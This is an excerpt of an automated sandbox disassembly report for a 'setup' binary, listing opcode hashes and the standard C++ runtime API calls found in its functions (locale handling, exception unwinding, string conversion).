              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1eebe2caae9b8a158f3128e1fabc652925f5f346da90b4f0161f2dbd429e670
              • Instruction ID: 871f54fc0db779868a5a090701f700894cad27f54d9f81b90d9814526fad5557
              • Opcode Fuzzy Hash: f1eebe2caae9b8a158f3128e1fabc652925f5f346da90b4f0161f2dbd429e670
              • Instruction Fuzzy Hash: 7EE08C32921228EBCB24EBC8CA05E8AF7FCEB48B50F150596B501E3240C670DE00D7D0
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 789eabfe958f7fbf276463b672dcd62d1ec78b8d6d636716bbce1a8341d290d8
              • Instruction ID: 2ead3732b21e67cc6e062d06ef813bcbe1ed482943e59a8c560bc8b97b5a0107
              • Opcode Fuzzy Hash: 789eabfe958f7fbf276463b672dcd62d1ec78b8d6d636716bbce1a8341d290d8
              • Instruction Fuzzy Hash: AAC08C34000A044ACF39AA1082B13B633A6E399782F9008CCD6038B6C2C51E9C82D600
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE22D2
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE22EF
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2310
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE236B
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE23AC
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE23EF
              • std::_Facet_Register.LIBCPMT ref: 00AE2418
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2431
                • Part of subcall function 00AE933A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE9346
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2465
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE247F
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE24A0
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE24F8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
              • String ID: bad locale name
              • API String ID: 3096327801-1405518554
              • Opcode ID: dc67a94dafc33c5fecaf97dd92a370b9aabb0e3386c92618d9ac9b4d81873ad7
              • Instruction ID: 12fa87ec18172497ca5cf1a869ae9fdebca7fc362784b1b471621a0367a8765c
              • Opcode Fuzzy Hash: dc67a94dafc33c5fecaf97dd92a370b9aabb0e3386c92618d9ac9b4d81873ad7
              • Instruction Fuzzy Hash: EE61D2326043828FD721DF1AD980A6BB7E4EF90760F15055DE8899B3A1DB35EC46CB92
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2465
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE247F
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE24A0
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE24F8
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE253D
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE258E
              • __Getctype.LIBCPMT ref: 00AE25A5
              • std::_Facet_Register.LIBCPMT ref: 00AE25CF
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE25E8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
              • String ID: bad locale name
              • API String ID: 2236780835-1405518554
              • Opcode ID: 112259b11cea387ea240c1ad41dc944a6aff26f4d8d64bdf2ea8c45805fabba9
              • Instruction ID: fc65a56f7d72bd2ab412a4f8ed9b0e0701017e708d5c3ce83c8704840f60ce75
              • Opcode Fuzzy Hash: 112259b11cea387ea240c1ad41dc944a6aff26f4d8d64bdf2ea8c45805fabba9
              • Instruction Fuzzy Hash: BB4122316043818FD320DF1ADA80B6BBBE4EF91750F15495DF8859B391DB75E806CBA2
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2625
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE263F
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2660
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE26BB
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2703
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE2761
              • __Getctype.LIBCPMT ref: 00AE2778
              • std::_Facet_Register.LIBCPMT ref: 00AE27CB
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE27E4
                • Part of subcall function 00AE933A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE9346
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
              • String ID: bad locale name
              • API String ID: 2137871723-1405518554
              • Opcode ID: ff364aaa7abba3101b5e1af4ca628ecf59c0124d09c36ccb04228e8ea3736cb8
              • Instruction ID: 4974e42d21eb12d74e6c2ce896a47b818282cbf57a011b815158025891211608
              • Opcode Fuzzy Hash: ff364aaa7abba3101b5e1af4ca628ecf59c0124d09c36ccb04228e8ea3736cb8
              • Instruction Fuzzy Hash: 395102319047818FD321DF2AC940B6BBBE4FF94350F144A4DE8999B362EB74E945CB92
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE2812
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE282F
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2850
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE28AB
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE28EC
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE292F
              • std::_Facet_Register.LIBCPMT ref: 00AE2958
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2971
                • Part of subcall function 00AE933A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE9346
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
              • String ID: bad locale name
              • API String ID: 3096327801-1405518554
              • Opcode ID: 25ab4b54f611759250f470ddada116ce3cdac727d55831c4a10c3b047e22361e
              • Instruction ID: 00c13c9329c83a43a8d0d73a5a8db76e878b286cc77c07b06a5d3508cf8fc8f4
              • Opcode Fuzzy Hash: 25ab4b54f611759250f470ddada116ce3cdac727d55831c4a10c3b047e22361e
              • Instruction Fuzzy Hash: 1941E372A043818FD310DF2AD98065BBBF4BF94750F04455DE885AB3A2DB34ED0ACB92
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4251
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE4298
              • Concurrency::cancel_current_task.LIBCPMT ref: 00AE435A
              • Concurrency::cancel_current_task.LIBCPMT ref: 00AE435F
              • Concurrency::cancel_current_task.LIBCPMT ref: 00AE4364
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
              • String ID: bad locale name$false$true
              • API String ID: 164343898-1062449267
              • Opcode ID: eaad70de155ecd323456e82219407d701af4d544cdee704f020d6709531e034f
              • Instruction ID: de103031e36081d1c18f28ccfa856761c2fac31426dedd91b354e5c28aeff3bf
              • Opcode Fuzzy Hash: eaad70de155ecd323456e82219407d701af4d544cdee704f020d6709531e034f
              • Instruction Fuzzy Hash: 4E4124715053819FC720EFA68981B9BBBE4BF98700F44492DF989DB352E770D805CB52
              APIs
              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AEB4F5
              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00AEB503
              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00AEB514
              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00AEB525
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: AddressProc$HandleModule
              • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
              • API String ID: 667068680-1247241052
              • Opcode ID: 0e3d8b2682dcbb5fbf79227949d3228c087724be95e7cacc20f006c82aa99e6d
              • Instruction ID: 5d4a290cc66d1c66b6ac852d171fdddf86167d156338a11e72f4dfc0e4f86788
              • Opcode Fuzzy Hash: 0e3d8b2682dcbb5fbf79227949d3228c087724be95e7cacc20f006c82aa99e6d
              • Instruction Fuzzy Hash: 03E0B631542720EBE3005FF4AC0988B3FA4EB297553058A56F805D32E0EBB85840CBA0
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 00AEEEB7
              • ___TypeMatch.LIBVCRUNTIME ref: 00AEEFC5
              • _UnwindNestedFrames.LIBCMT ref: 00AEF117
              • CallUnexpected.LIBVCRUNTIME ref: 00AEF132
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 6c330386c76815d5f23168874f8d9c64c59ff25aae023d800919cdaa0af13c33
              • Instruction ID: 93efffb63cc8e68a98a407e7b01b6dfb89f421113391bc102ba21dc616612fe2
              • Opcode Fuzzy Hash: 6c330386c76815d5f23168874f8d9c64c59ff25aae023d800919cdaa0af13c33
              • Instruction Fuzzy Hash: 81B18B71800299EFCF28DFA6C9819AEBBB5FF14310F14416AF8156B252E731EA51CB91
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3907804496
              • Opcode ID: 86ba6f946c651c47d051c4f92d2278324a5450d401d13d160714d7b731b956af
              • Instruction ID: 5d70067d125ca5a8f8781b86836e24b45b88d11b4d06af43f74e05865e72d53c
              • Opcode Fuzzy Hash: 86ba6f946c651c47d051c4f92d2278324a5450d401d13d160714d7b731b956af
              • Instruction Fuzzy Hash: EFB1E371A0424DAFDB11DFD8C880BBDBBF1AF59340F144165F611AB2A2DBB49D42CBA1
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00AEB311
              • __alloca_probe_16.LIBCMT ref: 00AEB33D
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00AEB37C
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AEB399
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AEB3D8
              • __alloca_probe_16.LIBCMT ref: 00AEB3F5
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AEB437
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AEB45A
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ByteCharMultiStringWide$__alloca_probe_16
              • String ID:
              • API String ID: 2040435927-0
              • Opcode ID: 69bbc8192b68bfa5e18ededd0598596e270af5c2975e95d3c7bcf6be0d2bbef4
              • Instruction ID: 0e22e8de48af5892f3c2fc5e2a691767dd7a452591eef07ca3ee23ce742d402a
              • Opcode Fuzzy Hash: 69bbc8192b68bfa5e18ededd0598596e270af5c2975e95d3c7bcf6be0d2bbef4
              • Instruction Fuzzy Hash: 6E51A37292029AEBEB219FA6CC49FAF7BA9EF44740F144525F905D71A1E7348D10CB70
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,AD69BC82,?,00AFCBB6,?,?,?,00000000), ref: 00AFCB6A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 650f80925c8f1b0938a6f281f26608744307e57e03e9496be7d42b12c2e093c0
              • Instruction ID: c618e967d82ab1d216b61d920ff85dd21b662553f0d82498b8092d7336d577a8
              • Opcode Fuzzy Hash: 650f80925c8f1b0938a6f281f26608744307e57e03e9496be7d42b12c2e093c0
              • Instruction Fuzzy Hash: C2212735A0021DEBCB229BA6DD46A7A77A9DB117B4F100211FB16A7290EF70EE00C6D0
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE299D
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE29BB
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE29DC
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2A2C
              • std::_Facet_Register.LIBCPMT ref: 00AE2A56
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2A6F
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
              • String ID:
              • API String ID: 1858714459-0
              • Opcode ID: fbab18c96e93b6d48fb3487186e81ccb68f140a514ed841fd0e361d0b19f66da
              • Instruction ID: e20e9a28367667233f984caeae2dd1d7bb293dbc5c48258858445aa36e3624ec
              • Opcode Fuzzy Hash: fbab18c96e93b6d48fb3487186e81ccb68f140a514ed841fd0e361d0b19f66da
              • Instruction Fuzzy Hash: BC21E4319003958FC721EF16ED80A6BB7A4FF913A0F14067DE841572A2DB35AD0AC7C2
              APIs
              • GetLastError.KERNEL32(?,?,00AEEA21,00AED15A,00AEC24A), ref: 00AEEA38
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AEEA46
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AEEA5F
              • SetLastError.KERNEL32(00000000,00AEEA21,00AED15A,00AEC24A), ref: 00AEEAB1
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 62afb6705d5a94aeb03c953d4ab4683232673a06dfbe6860aa4e61805a7c59e1
              • Instruction ID: 65f3524c833314ff4ba632204b2bb5807ebd31227f87cc0ae7e7172068eb5502
              • Opcode Fuzzy Hash: 62afb6705d5a94aeb03c953d4ab4683232673a06dfbe6860aa4e61805a7c59e1
              • Instruction Fuzzy Hash: D8014C3210D3955EE62457BA7E8552E6A64FB91BF2B30433FF915C30E0FF514C015544
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AD69BC82,?,?,00000000,00B0BB97,000000FF,?,00AF9632,?,?,00AF9606,00000000), ref: 00AF96D7
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AF96E9
              • FreeLibrary.KERNEL32(00000000,?,00000000,00B0BB97,000000FF,?,00AF9632,?,?,00AF9606,00000000), ref: 00AF970B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 4abe2ecb0d807672e9cb22af5f1faccfc1cb49bcfa3455f535637f8862325fdb
              • Instruction ID: 3d23c39fa17525c4ef90f47a497ea93dae0c50d5db70991dab9f3063f75bbe96
              • Opcode Fuzzy Hash: 4abe2ecb0d807672e9cb22af5f1faccfc1cb49bcfa3455f535637f8862325fdb
              • Instruction Fuzzy Hash: 41014F32A14759EBDB119F94DC45FBEBFB9FB04B14F044666F811A26E0EF749900CA90
              APIs
              • __alloca_probe_16.LIBCMT ref: 00B01CBA
              • __alloca_probe_16.LIBCMT ref: 00B01D7B
              • __freea.LIBCMT ref: 00B01DE2
                • Part of subcall function 00AFFDAA: HeapAlloc.KERNEL32(00000000,?,?,?,00AEB54E,?,?,00AE14CD,?,?,00AE83EE,?,?), ref: 00AFFDDC
              • __freea.LIBCMT ref: 00B01DF7
              • __freea.LIBCMT ref: 00B01E07
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocHeap
              • String ID:
              • API String ID: 1096550386-0
              • Opcode ID: 2da3d036879b10ffe55fd22c6dc1f80f50245fa78dc286660bc987f83918b4b8
              • Instruction ID: e57a7b531f4d4219da483b0a30fd4154d6ccaa025653c4ca8ebcc6af57bc817e
              • Opcode Fuzzy Hash: 2da3d036879b10ffe55fd22c6dc1f80f50245fa78dc286660bc987f83918b4b8
              • Instruction Fuzzy Hash: A951C87260020AAFEB299FA9CD85EBB7EE9EF04350B154AB9FD04D7191E731CC508660
              APIs
              • __EH_prolog3.LIBCMT ref: 00AEA049
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA053
                • Part of subcall function 00AE3BE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AE3BEF
                • Part of subcall function 00AE3BE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE3C0A
              • codecvt.LIBCPMT ref: 00AEA08D
              • std::_Facet_Register.LIBCPMT ref: 00AEA0A4
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA0C4
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
              • String ID:
              • API String ID: 712880209-0
              • Opcode ID: dbec05cab133f36d79788ca3451d19f6c91fa43f3e90a06c102f213523d8ba9e
              • Instruction ID: 7aa45bd8e3f1739743310f2805f76da30dd6674dbe96e4a6faf185deb62f5313
              • Opcode Fuzzy Hash: dbec05cab133f36d79788ca3451d19f6c91fa43f3e90a06c102f213523d8ba9e
              • Instruction Fuzzy Hash: F51100729102599FDB14EB6ADA057AEB7F8EF44320F200549E402A73D1DFB4AE008B91
              APIs
              • __EH_prolog3.LIBCMT ref: 00AE94F7
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE9502
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE9570
                • Part of subcall function 00AE9653: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AE966B
              • std::locale::_Setgloballocale.LIBCPMT ref: 00AE951D
              • _Yarn.LIBCPMT ref: 00AE9533
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
              • String ID:
              • API String ID: 1088826258-0
              • Opcode ID: b17ec5728f120128c3a4cf580f5fb32bcc72beeb30e8bff1cfd4b237bed5000c
              • Instruction ID: 76557421ffe22171e78c2fe59730a01b8c6724e672c4e8662c931c098343347d
